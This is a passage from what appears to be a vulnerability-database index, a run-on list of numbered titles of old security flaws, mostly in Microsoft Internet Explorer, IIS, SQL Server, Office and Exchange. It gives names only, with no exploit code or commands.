Authenticated User Remote Shutdown [11170] Microsoft IE iframe Malformed base href DoS [11157] Microsoft IIS FTP Service PASV Connection Saturation DoS [11152] Microsoft IE Malformed HTML Style DoS [11138] Microsoft IE HTML Rendering mshtml.dll NULL Pointer Dereference DoS [11101] Microsoft IIS Multiple Slash ASP Page Request DoS [11097] Windows NT SP2 Passfilt.dll Password Complexity Weakness [11088] Multiple VAX DECwindows Motif Server Local Privilege Escalation [11068] Windows NT Win32k.sys Incorrect Parameter Local DoS [11067] Windows NT NonPagedPool Lock Saturation DoS [11063] Microsoft Site Server Direct Mailer TMLBQueue Share Information Disclosure [11051] Microsoft Outlook cid: MIME Mishandling Forced Image Rendering [11018] Microsoft SNA Server AS/400 Local APPC LU Shared Folder Disclosure [11017] OpenVMS DECwindows/MOTIF User Account Lockout Weakness [11010] Windows 2003 Multiple DACL Insecure Permissions [10998] Microsoft Access Snapshot Viewer ActiveX Control Arbitrary Command Execution [10996] Microsoft File Transfer Manager ActiveX Control Arbitrary Command Execution [10995] Microsoft File Transfer Manager ActiveX Control Arbitrary File Upload/Download [10994] Microsoft DirectX Files Viewer ActiveX Control xweb.ocx Overflow [10992] Microsoft IE Embedded HTML Help Control Cross Zone Scripting [10991] Microsoft IE HTML Help Drag and Drop Arbitrary Code Injection [10977] Microsoft Eyedog ActiveX Server Side Redirect Arbitrary Command Execution [10969] HP Tru64 X Windows Unspecified Local Overflow [10968] HP Tru64 UNIX X Windows Unspecified File Permission Weakness [10967] Microsoft IE Javascript User Homepage Address Spoofing [10935] Microsoft Word Macro Security Model Bypass [10895] Microsoft FrontPage asycpict.dll JPEG Processing DoS [10756] Microsoft MSN heartbeat.ocx Component Overflow [10736] Microsoft Excel SYLK Macro Arbitrary Command Execution [10735] Microsoft Excel Virus Warning Mechanism Bypass [10734] Microsoft Word/Excel Shared Document INCLUDEPICTURE Field Arbitrary File Read [10733] Microsoft Word/Excel Shared Document INCLUDETEXT Field Arbitrary File Read [10714] Microsoft cabarc Traversal Arbitrary File Overwrite [10709] Microsoft IE SSL Cached Content Spoofing [10708] Microsoft IE Image Tag Arbitrary Script Execution (HijackClick 3) [10707] Microsoft IE Plug-in Navigation Address Bar Spoofing [10706] Microsoft IE Double Byte Character Set Address Bar Spoofing [10705] Microsoft IE Install Engine Inseng.dll Arbitrary Code Execution [10704] Microsoft IE Similar Method Name Redirection Cross Domain/Site Scripting [10694] Microsoft Excel XLS File Local Overflow (MS04-033) [10670] Microsoft ASP.NET Forms .aspx File Authentication Bypass [10561] Apple QuickTime Player for Windows URL Handling Overflow [10557] Microsoft ASP.NET Canonicalization Authentication Bypass [10550] Microsoft IE Redirect Script Arbitrary XML Document Access [10549] Microsoft Word .doc Parsing Exception Arbitrary Command Execution [10379] Microsoft SQL Server Large Query DoS [10358] Microsoft Outlook Client Persistent X-UIDL Header DoS [10246] Microsoft Exchange Server Malformed NNTP AUTHINFO DoS [10183] Microsoft SQL Server xp_sprintf Function DoS [10181] Microsoft SQL Server formatmessage Function DoS [10166] Microsoft SQL Server raiserror Function DoS [10159] Microsoft SQL Server Multiple Extended Stored Procedure Overflows [10158] Microsoft SQL Server Password Encryption Procedure Overflow [10157] Microsoft SQL Server BULK INSERT Query Overflow [10156] Microsoft SQL Server SQLExecutiveCmdExec Account Credential Encryption Weakness [10155] Microsoft SQL Server Enterprise Manager Authentication Credential Encryption Weakness [10154] Microsoft SQL Server xp_SetSQLSecurity Function Overflow [10153] Microsoft SQL Server xp_proxiedmetadata Function Overflow [10152] Microsoft SQL Server xp_printstatements Function Overflow [10151] Microsoft SQL Server xp_peekqueue Function Remote Overflow [10150] Microsoft SQL Server xp_updatecolvbm Function Overflow [10149] Microsoft SQL Server xp_showcolv Function Remote Overflow [10148] Microsoft SQL Server xp_enumresultset Function Overflow [10147] Microsoft SQL Server xp_displayparamstmt Function Overflow [10146] Microsoft SQL Server xp_sprintf Function Overflow [10145] Microsoft SQL Server formatmessage Function Overflow [10144] Microsoft SQL Server raiserror Function Overflow [10143] Microsoft SQL Server OpenRowset OLE DB Provider Name Overflow [10142] Microsoft SQL Server OpenDataSource OLE DB Provider Name Overflow [10141] Microsoft SQL Server sestup.iss File Authentication Credential Disclosure [10140] Microsoft SQL Server Stored Procedure Arbitrary Command Execution [10139] Microsoft SQL Server Agent Arbitrary File Creation [10138] Microsoft SQL Server xp_displayparamstmt Procedure Privilege Escalation [10137] Microsoft SQL Server xp_printstatements Procedure Privilege Escalation [10136] Microsoft SQL Server xp_execresultset Procedure Privilege Escalation [10135] Microsoft SQL Server Malformed 0x08 Packet DoS [10133] Microsoft SQL Server sp_MScopyscript Procedure scriptfile Parameter Arbitrary Code Execution [10132] Microsoft SQL Server Authentication Function Remote Overflow [10131] Microsoft SQL Server DBCC SourceDB Argument Arbitrary Command Execution [10129] Microsoft Data Access Components SQL-DMO Broadcast Request Overflow [10127] Microsoft SQL Server xp_runwebtask Procedure Privilege Escalation [10126] Microsoft SQL Server CreateFile API Function Privilege Escalation [10125] Microsoft SQL Server Named Pipe Hijack Privilege Escalation [10123] Microsoft SQL Server LPC Packet Handling Local Overflow [10104] Microsoft BizTalk Server DTA RawCustomSearchField.asp SQL Injection [10103] Microsoft BizTalk Server DTA rawdocdata.asp SQL Injection [10050] IBM OEM Windows XP Home Default Hidden Administrator Account [10006] Microsoft WordPerfect Converter Corel File Multiple Parameter Remote Overflow [9951] Microsoft Multiple Products GDIPlus.dll JPEG Processing Overflow [9896] Microsoft Netmeeting Remote Desktop Sharing Remote Session Hijack [9895] Microsoft NetMeeting Arbitrary Clipboard Content Disclosure [9818] F-Secure Anti-Virus For Microsoft Exchange Content Scanner Server Exception Handling DoS [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing [9671] Microsoft IE onUnload Address Bar Spoofing [9591] Windows Kernel Error Message Debugging Local Overflow [9560] HP Systems Insight Manager Microsoft Security Patch Login DoS [9543] Jetty CGI+windows Unspecified Security Issue [9315] Microsoft IIS getdrvs.exe ODBC Sample Information Disclosure [9314] Microsoft IIS mkilog.exe ODBC Sample Arbitrary Command Execution [9207] Microsoft Content Management ManualLogin.asp REASONTXT Parameter XSS [9200] Microsoft IIS Unspecified XSS Variant [9199] Microsoft IIS shtml.dll XSS [9189] Microsoft ASP.Net Null Character XSS Protection Bypass [9172] Microsoft IE File/Directory Existence Disclosure [9167] Microsoft Outlook Express BCC: Recipient Information Disclosure [9070] Microsoft IE dragDrop Arbitrary File Upload (What a Drag II) [8978] Microsoft IE Address Bar Spoofing (NullyFake) [8941] Microsoft IE Merlin.speak Function CPU DoS [8428] Microsoft NetMeeting Malformed Packets DoS [8414] Microsoft IE mms: Protocol Handler Arbitrary Command [8372] thttpd for Windows Encoded Traversal Arbitrary File Access [8335] Microsoft IE mshtml.dll Null Pointer DoS [8309] Mozilla Browsers For Windows XPInstall Security Dialog Arbitrary Extension Installation [8277] Microsoft IE Malformed GIF Double-free DoS [8276] Microsoft IE Malformed BMP Overflow [8275] Microsoft IE Navigation Cross Domain Execution (InsiderPrototype) [8243] Microsoft SMS Port 2702 DoS [8224] Microsoft IE CSS Memory Corruption DoS [8211] Microsoft Exchange Server Malformed SMTP Command DoS [8210] Microsoft HTML Control Large Form Field DoS [8148] Microsoft IE Arbitrary File Write (What a Drag) [8129] Microsoft IE CSS Malformed div element DoS [8098] Microsoft IIS Virtual Directory ASP Source Disclosure [8053] Microsoft Virtual Machine Illegal Cast Operation Command Execution [8052] Microsoft ActiveX Control Arbitrary Cabinet File Execution [7963] Microsoft IE parent.window.open location.cache Script Execution [7951] Microsoft SMS Remote Control Client DoS [7916] Microsoft IE Multimedia Page XSS (viaSWFurl) [7915] Microsoft IE ADODB.Stream Media Arbitrary File Execution [7914] Microsoft IE .FOLDER File Type Execution [7913] Microsoft IE Shell.Application ActiveX Arbitrary Command Execution [7912] Microsoft IE showHelp() Arbitrary File Execution [7910] Microsoft IE Double Slash Cache File Execution (DblSlashForCache) [7909] Microsoft IE Cache Location Information Disclosure (execdror6) [7907] Microsoft IE FileSystemObject ActiveX Object Arbitrary Command Execution [7906] Microsoft IE WebBrowser ActiveX Object Clipboard Content Disclosure [7905] Microsoft IE ie5setup.exe Multple Service Disable [7903] Microsoft IE external.NavigateAndFind Arbitrary File Access [7902] Microsoft IE / Outlook Express Active Scripting Arbitrary E-mail Message Access [7901] Microsoft IE Active Setup ActiveX Component Arbitrary Software Installation [7900] Microsoft IE WebBrowser Control NavigateComplete2 Policy Bypass [7899] Microsoft IE with ActivePython ActiveX Control Arbitrary File Read [7898] Microsoft IE with Google Toolbar Malicious HTML DoS [7897] Microsoft IE Crafted Filename Arbitrary Visual FoxPro Application Execution [7896] Microsoft IE Java Implementation Malformed Domain Portion Arbitrary Script Execution [7895] Microsoft IE MS-DOS Device Name URL DoS [7894] Microsoft IE Object Tag Type Property Double-byte Overflow [7893] Microsoft IE window.open file: Security Bypass (WsOpenFileJPU) [7892] Microsoft IE href Javascript Arbitrary Command Execution (BodyRefreshLoadsJPU) [7890] Microsoft IE Download Function Cache Disclosure (threadid10008) [7889] Microsoft IE createTextRange Security Bypass (LinKiller) [7888] Microsoft IE createRange FIND Dialog Security Bypass (Findeath) [7887] Microsoft IE XML Data Binding Object Tag Arbitrary Command Execution [7886] Microsoft Java Virtual Machine StandardSecurityManager Restriction Bypass [7885] Microsoft Java Implementation Applet Tag DoS [7884] Microsoft Java Virtual Machine Passed HTML Object DoS [7883] Microsoft Java Implementation CabCracker Class Security Bypass [7882] Microsoft Java Applet Codebase Tag Arbitrary File Read [7881] Microsoft Java Implementation INativeServices Clipboard Content Disclosure [7880] Microsoft Java INativeServices Arbitrary Memory Information Disclosure [7879] Microsoft Java getAbsolutePath Current Directory Disclosure [7878] Microsoft Java Virtual Machine ClassLoader.loadClass Overflow [7877] Microsoft Java Virtual Machine Class.forName Overflow [7876] Microsoft IE .isp File Arbitrary Command Execution [7874] Microsoft IE Cross-domain Sub-frame Navigation Content Spoofing [7872] Microsoft IE ActiveX Object Code Arbitrary Command Execution (Qhosts) [7866] Microsoft IE Frame Spoofing Content Injection [7864] Microsoft IE URL History FTP Credential Disclosure [7863] Microsoft IE OBJECT Tag Long CLASSID DoS [7862] Microsoft IE User DAT File History Disclosure [7861] Microsoft IE Standard Cache Control Authentication Credential Leak [7860] Microsoft IE Java JSObject Cross Frame Security Policy Bypass [7859] Microsoft IE Frame Domain Verification Arbitrary File Access [7858] Microsoft IE CLSID Alteration Arbitrary Command Execution [7857] Microsoft IE Script Tag SRC Value Arbitrary File Access [7856] Microsoft IE Q312461 Patch HTTP_USER_AGENT Information Disclosure [7854] Microsoft IE Chinese Character Scrolling DoS [7853] Microsoft IE window.createPopup Chromeless Window Spoofing [7852] Microsoft IE showModelessDialog Infinite Loop DoS [7851] Microsoft IE Multiple Form Field DoS [7850] Microsoft IE Malformed Content Header Arbitrary Command Execution [7849] Microsoft IE Javascript location.replace Recursive DoS [7848] Microsoft IE userData storeuserData Cookie Privacy Setting Bypass [7847] Microsoft IE JVM System.out.println Logging Arbitrary Command Execution [7846] Microsoft IE PNG Invalid Length Code DoS [7845] Microsoft IE Encoded URL Information Disclosure [7844] Microsoft IE Object Tag Temporary File Information Disclosure [7843] Microsoft IE URLMON.DLL Multiple Overflows [7842] Microsoft IE File Upload Control Arbitrary File Access [7841] Microsoft IE Scriptlet Component Arbitrary File Access [7840] Microsoft IE Javascript Applet Data Redirect Arbitrary File Access [7839] Microsoft IE Malformed Favorite Icon Arbitrary Command Execution [7838] Microsoft IE File Upload Control Paste Arbitrary File Read [7837] Microsoft IE Cross Frame Security Arbitrary File Access [7836] Microsoft IE EMBED Tag Overflow [7835] Microsoft IE IFRAME Document.ExecCommand Restriction Bypass Arbitrary File Access [7834] Microsoft IE Preloader Legacy ActiveX Arbitrary File Access [7833] Microsoft IE/OE res: Protocol Library Overflow [7832] Microsoft IE Client Window Reference Server Side Arbitrary File Access [7831] Microsoft IE Virtual Machine Java Applet Sandbox Bypass [7830] Microsoft IE mk: URL Handling Remote Overflow [7829] Microsoft IE JScript Engine Window.External Function Arbitrary Command Execution [7828] Microsoft IE Dotless IP Address Zone Privilege Escalation [7827] Microsoft IE Cross Security Domain Arbitrary File Access [7826] Microsoft IE SSL Certificate Validation Failure (v2) [7825] Microsoft IE Domain Frame Arbitrary File Access [7824] Microsoft IE Virtual Machine Unsigned Applet Arbitrary Command Execution [7823] Microsoft IE Cached Content .chm Arbitrary Program Execution [7822] Microsoft IE HTML Form Input Element Arbitrary File Access [7821] Microsoft IE Print Templates Feature Arbitrary ActiveX Execution [7820] Microsoft IE Scriptlet Invoking ActiveX Arbitrary File Access [7819] Microsoft IE Small IFRAME DHTML Arbitrary File Access [7818] Microsoft IE Page Redirect Authentication Credential Leak [7817] Microsoft IE Frame Domain Validation Arbitrary File Access [7816] Microsoft IE SFU Telnet Client Arbitrary Command Execution [7807] Microsoft IIS ISAPI Virtual Directory UNC Mapping ASP Source Disclosure [7806] Microsoft IE HTML E-mail Feature Unusual MIME Type Command Execution [7802] Microsoft IE File Download Extension Spoofing [7801] Microsoft IE Javascript window.open Null-Pointer DoS [7793] Microsoft Outlook Express Header Validation DoS [7779] Microsoft IE AnchorClick Cross Zone Scripting [7778] Microsoft Outlook Window Opener Script Execution [7776] Microsoft IE Download Window Filename Filetype Spoofing [7775] Microsoft IE Channel Link Script Injection [7774] Microsoft IE Popup.show() Click Hijack (HijackClick 3) [7769] Microsoft Outlook With Word Editor Object Tag Code Execution [7762] Microsoft Java Virtual Machine Cross-Site Communication [7746] Windows NT FTP Server (WFTP) CD Command Arbitrary File Access [7739] Microsoft IE plugin.ocx Load() Method Overflow [7737] Microsoft IIS ASP Redirection Function XSS [7608] Microsoft Index Server Internet Data Query Path Disclosure [7607] Microsoft IE CSS Unterminated Comment Handling Memory Corruption [7595] Mozilla Browsers for Windows shell: URI Arbitrary Command Execution [7405] Microsoft Phone Dialer (dialer.exe) Dialer Entry Overflow [7296] Microsoft IE Cross-domain Frame Injection Content Spoofing [7293] Microsoft Plus! Compressed Folder Password Disclosure [7265] Microsoft IIS .ASP Session ID Disclosure and Hijacking [7202] Microsoft PowerPoint 2000 File Loader Overflow [7187] Microsoft MN-500 Web Administration Multiple Connections DoS [7168] Microsoft Data Access Component Internet Publishing Provider WebDAV Security Zone Bypass [7096] Microsoft Outlook Express Mac OS Auto HTML Download [7055] Microsoft Outlook Express for Mac OS E-mail Long Line DoS [6971] Microsoft ISA Server 2000 ICMP Rule Bypass During Startup [6970] Microsoft ISA Server 2000 Web Publishing Unencrypted Credentials Disclosure [6969] Microsoft ISA Server 2000 Invalid DNS Request DoS [6968] Microsoft ISA Server 2000 FTP Port Scan Bounce Weakness [6967] Microsoft ISA Server 2000 UDP Packet Winsock DoS [6965] Microsoft ISA Server 2000 SSL Packet DoS [6964] Microsoft ISA Server 2000 DNS Intrusion Detection Filter DoS [6963] Microsoft IE showModalDialog Method Arbitrary Code Execution [6931] Microsoft IE/Outlook Double Null Character DoS [6749] Microsoft Crystal Reports Web Viewer crystalimagehandler.aspxArbitrary File Access [6742] Microsoft DirectPlay Packet Validation DoS [6674] Microsoft Office 98 for Macintosh Disk Space Information Disclosure [6672] Microsoft SharePoint with MSIE settings.htm Authentication Bypass [6538] Microsoft IE/Outlook ImageMap URL Spoofing [6272] Microsoft IE MIME Content-Type Header Processing Weakness Cross-content XSS [6257] Symantec Norton Anti-Virus CE Windows XP Floppy Scan Bypass [6217] Microsoft Outlook RTF Embedded Object Security Bypass [6121] Microsoft Outlook Express BASE HREF Web Content Loading [6080] Microsoft IE MSHTML.DLL Cross-Frame Script Execution [6079] Microsoft Outlook Remote XML Loading [6031] Microsoft Exchange Multiple SMTP Command DoS [6007] Microsoft IE/Outlook IMG/HREF Tag Code Execution [5998] Microsoft Outlook Predictable File Caching [5993] Microsoft Active Server Pages (ASP) Engine Malformed Cookie Handling Remote Information Disclosure [5965] Microsoft IE MSHTML.DLL IMG SRC Tag Information Disclosure [5936] Microsoft SMTP Service 4xx Error Code DoS [5887] Microsoft Access 97 Cleartext Password Storage [5884] Microsoft Site Server ASP Upload Remote Command Execution [5869] Microsoft IE MSHTML.DLL Javascript %01 URL Arbitrary File Access [5856] X Windows (X11) Magic Cookie Prediction Command Execution [5855] Microsoft Exchange MTA HELO Command Remote Overflow [5851] Microsoft IIS Single Dot Source Code Disclosure [5833] Windows NT FTP Server (WFTP) Unprintable Character Overflow [5829] Windows NT FTP Server (WFTP) Error Message Server Path Disclosure [5736] Microsoft IIS Relative Path System Privilege Escalation [5694] Microsoft IE Address Bar URL Spoofing [5693] Microsoft MS00-060 Patch IIS Malformed Request DoS [5633] Microsoft IIS Invalid WebDAV Request DoS [5608] Microsoft NetMeeting Malformed String DoS [5606] Microsoft IIS WebDAV PROPFIND Request DoS [5600] Oracle Database on Windows NT Net8 Listener Thread Exhaustion Remote DoS [5584] Microsoft IIS URL Redirection Malformed Length DoS [5581] Trend Micro ScanMail for Microsoft Exchange Administrative Credential Disclosure [5566] Microsoft IIS Form_VBScript.asp XSS [5563] Microsoft IE Telnet Client SFU Arbitrary Command Execution [5557] Microsoft Outlook Web Access With IE Embedded Script Execution [5556] Microsoft IE Dotless IP Intranet Zone Spoofing [5419] Microsoft IE mshtml.dll EMBED Directive Overflow [5390] Microsoft Exchange NTLM Null Session Mail Relay [5357] Microsoft Multiple Products for Mac File URL Overflow [5356] Microsoft IE for Mac Local AppleScript Invocation [5355] Microsoft MSN Chat ActiveX ResDLL Parameter Overflow [5347] Microsoft SQL Server SQLXML ISAPI Extension Remote Overflow [5343] Microsoft SQL Server SQLXML root Parameter XSS [5342] Microsoft IE Malformed Web Page Zone Spoofing [5316] Microsoft IIS ISAPI HTR Chunked Encoding Overflow [5242] Microsoft IE/Outlook MHTML .chm ITS Protocol Handler Code Execution [5241] Microsoft Jet Database Engine Remote Code Execution [5175] Microsoft Excel Hyperlinked Workbook Arbitrary Code Execution [5174] Microsoft Excel Inline Macro Arbitrary Code Execution [5173] Microsoft Excel Embedded XSL Stylesheet Arbitrary Code Execution [5172] Microsoft Commerce Server OWC Installer LocalSystem Arbitrary Code Execution [5171] Microsoft Word 2002 Mail Merge Tool Execute Arbitrary Script [5170] Microsoft Commerce Server OWC Installer Arbitrary Command Execution [5163] Microsoft Commerce Server AuthFilter ISAPI Filter Overflow [5162] Microsoft IE Legacy Data-island Capability Read Arbitrary XML File [5152] Microsoft Legacy Text Formatting ActiveX Control Overflow [5134] Microsoft IE Reference Local HTML Resource Script Execution [5133] Microsoft Metadirectory Services LDAP Client Authentication Bypass [5129] Microsoft IE Download File Origin Spoofing [5126] Microsoft BackOffice Authentication Bypass [5124] Microsoft TSAC ActiveX Long Server Name Overflow [5064] Microsoft SQL Server Jet Engine OpenDataSource Function Overflow [4968] Microsoft SharePoint Portal Server Multiple Unspecified XSS [4951] Microsoft IE CLASSID Remote DoS [4932] Microsoft Outlook Web Access SecurID Authentication Bypass [4915] Microsoft Content Management Server (MCMS) Web Authoring Command File Upload Arbitrary Code Execution [4914] Microsoft Content Management Server (MCMS) Resource Request SQL Injection [4864] Microsoft IIS TRACK Logging Failure [4863] Microsoft IIS Active Server Page Header DoS [4862] Microsoft Content Management Server (MCMS) Unspecified Authentication Function Overflow [4791] Microsoft IIS Response Object DoS [4779] Microsoft Desktop Engine (MSDE) 2000 Stored Procedure SQL Injection [4778] Microsoft SQL Server 2000 Stored Procedure SQL Injection [4777] Microsoft Desktop Engine (MSDE) 2000 Database Consistency Checkers (DBCCs) Overflow [4776] Microsoft SQL Server 2000 Database Consistency Checkers (DBCCs) 2000 Overflow [4734] InoculateIT Microsoft Exchange Inbox Folder Tree Moved Message Scanning Bypass [4655] Microsoft IIS ssinc.dll Long Filename Overflow [4627] Microsoft IE Text Control Overflow [4626] Microsoft DirectX Files Viewer xweb.ocx Overflow [4578] Microsoft SQL Resolution Service Monitor Thread Registry Key Name Overflow [4577] Microsoft SQL Resolution Service 0x08 Byte Long String Overflow [4535] Microsoft Media Services ISAPI nsiislog.dll POST Overflow [4513] Microsoft Visual C++ Constructed ISAPI Extensions [4337] Windows NT FTP Server (WFTP) Pro Server Administrative GUI DoS [4186] Microsoft IE Cookie Path Traversal [4168] Microsoft Outlook 2002 mailto URI Script Injection [4116] Windows NT FTP Server (WFTP) Xerox Docutech DoS [4115] Windows NT FTP Server (WFTP) Server CPU Utilization DoS [4114] Windows NT FTP Server (WFTP) Server STAT/LIST Command DoS [4078] Microsoft IE Cross Frame Scripting Restriction Bypass [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure [3968] Microsoft FrontPage Personal Web Server Arbitrary File Access [3893] Microsoft Virtual PC for Mac Insecure Temporary Files Creation [3879] Microsoft IE File Identification Variant [3791] Microsoft IE Travel Log Arbitrary Script Execution [3738] Microsoft IE Content-disposition Header File Download Extension Spoofing [3512] Microsoft IIS ODBC Tool getdrvrs.exe Remote DSN Creation [3501] Microsoft FrontPage form_results Information Disclosure [3500] Microsoft IIS fpcount.exe Remote Overflow [3490] Microsoft Exchange 2003 OWA Mailbox Access Information Disclosure [3457] Microsoft MDAC Broadcast Reply Overflow [3446] HD Soft Windows Ftp Server wscanf Function Format String [3386] Microsoft FrontPage Server Extensions htimage.exe File Existence Enumeration [3385] Microsoft FrontPage Server Extensions htimage.exe Remote Path Disclosure [3384] Microsoft FrontPage htimage.exe Overflow [3383] Microsoft FrontPage Server Extensions imagemap.exe File Verification [3382] Microsoft FrontPage Server Extensions imagemap.exe Remote Path Disclosure [3381] Microsoft FrontPage imagemap.exe Overflow [3341] Microsoft IIS Redirect Response XSS [3339] Microsoft IIS HTTP Error Page XSS [3338] Microsoft IIS Help File XSS [3328] Microsoft IIS FTP Status Request DoS [3326] Microsoft IIS w3svc.dll ISAPI Filter URL Handling Remote DoS [3325] Microsoft IIS HTR ISAPI Overflow [3323] Microsoft IIS ISAPI .printer Extension Host Header Overflow [3320] Microsoft IIS ASP Server-Side Include Buffer Overflow [3316] Microsoft IIS HTTP Header Field Delimiter Overflow [3313] Microsoft Word Form Protection Bypass [3307] Microsoft IE showHelp() Zone Restriction Bypass [3301] Microsoft IIS ASP Chunked Encoding Variant Heap Overflow [3300] Microsoft FrontPage shtml MS-DOS Device Name DoS [3284] Microsoft IIS Winmsdp.exe Arbitrary File Retrieval [3257] Jordan Windows Telnet Server Overflow [3231] Microsoft IIS Log Bypass [3225] Microsoft IE for Mac Information Disclosure [3195] Microsoft Exchange OWA REFERER Header XSS [3144] Microsoft IE MHTML Redirection Local File Parsing (MhtRedirParsesLocalFile) [3143] Microsoft IE MHTML Arbitrary File Execution (MhtRedirLaunchInetExe) [3142] Microsoft IE Subframe XSS (BackToFramedJpu) [3108] Microsoft Office 98 Macintosh Information Disclosure [3104] Microsoft IE PPC Overwrite Arbitrary Files [3099] Microsoft IE _search Window Execute Code (WsBASEjpu) [3098] Microsoft IE history.back NAF Function Execute Script (NAFjpuInHistory) [3097] Microsoft IE window.open Function Execute Code (WsFakeSrc) [3096] Microsoft IE NavigateAndFind Function Execute Code (NAFfileJPU) [3095] Microsoft IE history.back Function Information Disclosure (RefBack) [3094] Microsoft IE window.moveBy Cursor Hijack (HijackClick) [3068] Microsoft IE MSHTML/EditFlag Auto Open DoS [3066] Microsoft IE Custom HTTP Errors Script Injection [3065] Microsoft IE Unparsable XML File XSS [3056] Microsoft IE MSN/Alexa Information Leak [3055] Microsoft IE Spoofed URL [3054] Microsoft IE %USERPROFILE% Folder Disclosure [3053] Microsoft IE MHTML File Handler Arbitrary Script Injection [3052] Microsoft IE/Outlook CODEBASE PopUp Object Remote Execution [3051] Microsoft IE MHT Web Archive Overflow [3050] Microsoft IE dragDrop Method Local File Reading [3049] Microsoft IE ftp.htt FTP Web View URL XSS [3036] Microsoft IE dynsrc File Information Leak [3035] Microsoft WebBrowser Control t:video File Execution [3034] Microsoft IE JavaScript script src Local File Enumeration [3033] Microsoft IE Content Type/Disposition File Execution [3032] Microsoft IE XMLHTTP Control Arbitrary Remote File Access [3031] Microsoft IE document.Open Same Origin Policy Violation [3030] Microsoft IE GetObject() Function Traveral Arbitrary File Access [3029] Microsoft IE Cookie Execute Script in Local Computer Zone [3028] Microsoft IE Content-disposition Header Auto Download/Execute [3011] Microsoft IE OWC ConnectionFile File Existence Verification [3010] Microsoft IE OWC XMLURL File Existence Verification [3009] Microsoft IE OWC Load File Existence Verification [3008] Microsoft IE OWC Cut/Paste Data Read and Injection [3007] Microsoft IE OWC LoadText Read Arbitrary File [3006] Microsoft IE OWC Script Execution [3005] Microsoft IE WebBrowser Control dialogArguments XSS [3004] Microsoft IE Gopher Client Overflow [3003] Microsoft IE/Outlook OBJECT Cross Domain Scripting [3002] Microsoft IE File Extension Dot Parsing [3001] Microsoft IE XP HCP URI Handler File Deletion [2999] Microsoft IE Powerpoint Mouse-Over Execute [2998] Microsoft IE Frame Javascript URL Cross-Domain Script Execution [2997] Microsoft IE oIFrameElement.Document IFRAME Bypass [2996] Microsoft IE Object Zone Redirection [2995] Microsoft IE (VictimWindow).document.write Cross Domain Scripting (SaveRef) [2994] Microsoft IE (NewWindow).location.assign Save Reference [2993] Microsoft IE % URL Encoding XSS [2992] Microsoft IE HTML Help ActiveX Control alink and showHelp Overflow [2991] Microsoft WinHlp Active-X Item Parameter Overflow [2990] Microsoft IE IFRAME dialogArguments Object Bypass (BadParent) [2986] Microsoft IE clipboardData Object Caching Cross-domain Policy Bypass [2985] Microsoft IE execCommand Object Caching [2984] Microsoft IE getElementsByTagName Object Caching [2983] Microsoft IE getElementsByName Object Caching [2982] Microsoft IE getElementById Object Caching [2981] Microsoft IE elementFromPoint Object Caching [2980] Microsoft IE createRange Object Caching [2979] Microsoft IE external Object Caching [2978] Microsoft IE showModalDialog Object Caching [2977] Microsoft IE XML Datasource Read Local Files [2976] Microsoft IE CTRL Key onkeydown Remote File Theft [2975] Microsoft IE Back Button XSS [2974] Microsoft IE/Outlook Temporary Internet File Execution [2973] Microsoft IE Third Party Plugin Rendering XSS [2972] Microsoft IE showModalDialog Script Execution [2971] Microsoft WMP File Attachment Script Execution [2970] Microsoft IE cssText Arbitrary File Access [2969] Microsoft VM Bytecode Verifier Execute Arbitrary Code [2968] Microsoft IE File Download Dialog Overflow [2967] Microsoft IE Object Type Property Overflow [2966] Microsoft IE BR549.DLL Overflow [2965] Microsoft IE Cache Script Execution in My Zone [2963] Microsoft IE align HTML Converter Overflow [2952] Microsoft FrontPage Server Extensions (fp30reg.dll) Debug Function Chunked Encoded Request Remote Overflow [2917] Microsoft Access Known Database Attack [2801] Microsoft Word and Excel Execution of Arbitrary Code [2800] Microsoft FrontPage Server Extensions SmartHTML DoS [2784] Microsoft IE Component Function Information Disclosure [2783] Microsoft IE XML Objection Information Disclosure (IredirNrefresh) [2751] Microsoft Word Macro Name Handling Overflow [2745] Microsoft HTML Help Control Privilege Escalation [2707] Microsoft IE Drag and Drop Arbitrary File Installation [2679] Microsoft Outlook Web Access XSS [2674] Microsoft Exchange SMTP Extended Request Overflow [2592] Microsoft PowerPoint Modify Protection Bypass [2572] Microsoft BizTalk Server Insecure Permissions [2544] Microsoft ASP.NET Request Validation Bypass [2510] Microsoft Access Snapshot Viewer Buffer Overflow [2508] Microsoft Visual Basic for Applications Buffer Overflow [2506] Microsoft Word/Works Automated Macro Execution [2453] Microsoft IE My Computer Zone Caching Issue [2451] Microsoft IE Object Data Header Type Safe File Execution [2423] Microsoft MCWNDX.OCX ActiveX Plugin Overflow [2329] Microsoft SQL Server Named Pipe Hijacking Local Privilege Escalation [2320] Microsoft ISA Server HTTP Error Handler XSS [2306] Microsoft FrontPage Server Extensions SmartHTML Interpreter shtml.dll DoS [2299] Microsoft SQL Server Named Pipe Handling Request Remote DoS [2298] Microsoft ISA Server Error Page XSS [2291] Microsoft IE DOM Script Source Recursive DoS [2288] Microsoft Utility Manager Local Privilege Escalation [2283] Microsoft Exchange OWA Execute Arbitrary Code [2239] Microsoft NetMeeting Arbitrary File Write/Execution [2106] Microsoft Media Services ISAPI nsiislog.dll Overflow [2096] Microsoft ISA Server SurfControl Web Filter [2062] CiscoSecure ACS For Windows Format String Overflow [2061] Microsoft Outlook HTML Mail Script Execution [2060] Microsoft IE Known Local File Script Execution [2049] Microsoft Commerce Server ISAPI Long Authentication Overflow [2047] Microsoft IE Content-Type Field Arbitrary File Execution [2046] Microsoft IE Forced Script Execution [2045] Microsoft IE HTML Document Directive Overflow [2043] Microsoft Telnet Server Protocol Option Handling Remote Overflow [2042] Microsoft Exchange System Attendant WinReg Remote Registry Key Manipulation [2041] Microsoft Office for Macintosh Network PID Checker DoS [2010] Microsoft SQL Server C Runtime Functions Format String DoS [2008] Microsoft IE Same Origin Policy Violation [2004] Microsoft IE Cross-frame Remote File Access [1995] Microsoft IE Download Dialog File Extension Spoofing Weakness [1992] Microsoft IE Cookie Disclosure [1982] Microsoft IE about: URI XSS [1978] Microsoft IE for Mac OS Download Execution [1972] Microsoft IE HTTP Request Encoding Spoofing Weakness [1971] Microsoft IE Dotless IP Zone Spoofing Weakness [1968] Microsoft Excel/PowerPoint Macro Security Bypass [1957] Microsoft Exchange OWA Malformed Request DoS [1949] Symantec Norton Anti-Virus for Microsoft Exchange 2000 INBOX Path Information Disclosure [1934] Microsoft ISA Server Invalid URL Error Message XSS [1933] Microsoft ISA Server Proxy Service Memory Leak DoS [1932] Microsoft ISA Server H.323 Memory Leak DoS [1931] Microsoft IIS MIME 